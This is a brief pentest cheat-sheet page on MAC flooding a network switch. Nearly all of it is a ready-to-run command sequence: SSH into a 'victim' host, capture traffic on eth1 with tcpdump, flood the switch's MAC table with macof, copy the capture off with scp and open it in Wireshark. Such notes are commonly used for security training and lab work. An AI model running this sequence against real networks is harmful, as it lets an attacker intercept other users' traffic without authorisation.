MAC Flooding Attack

Last modified: 2022-11-20

Network

It is a technique that compromises the security of network switches.

Attack Flow

Open Two SSH Sessions

Start the SSH session 1 in terminal 1.
```
ssh victim@<target-ip>
```
Start the SSH session 2 in terminal 2.
Flood the Switch and Capturing the Traffic

In the session 1, start tcpdump and keep it running.
```
tcpdump -A -i eth1 -w /tmp/tcpdump.pcap
```
In the session 2, start flooding the switch (here "eth1" interface).
```
macof -i eth1
```
After about 30 seconds, stop macof and tcpdump.
Investigate the Captured Traffic

In your local machine, transfer the dumped file named "/tmp/tcpdump.pcap" from the target machine to your local machine.
```
scp victim@<target-ip>:/tmp/tcpdump.pcap .
```
Investigate this file using Wireshark
```
wireshark ./tcpdump.pcap
```

ON THIS PAGE

Attack Flow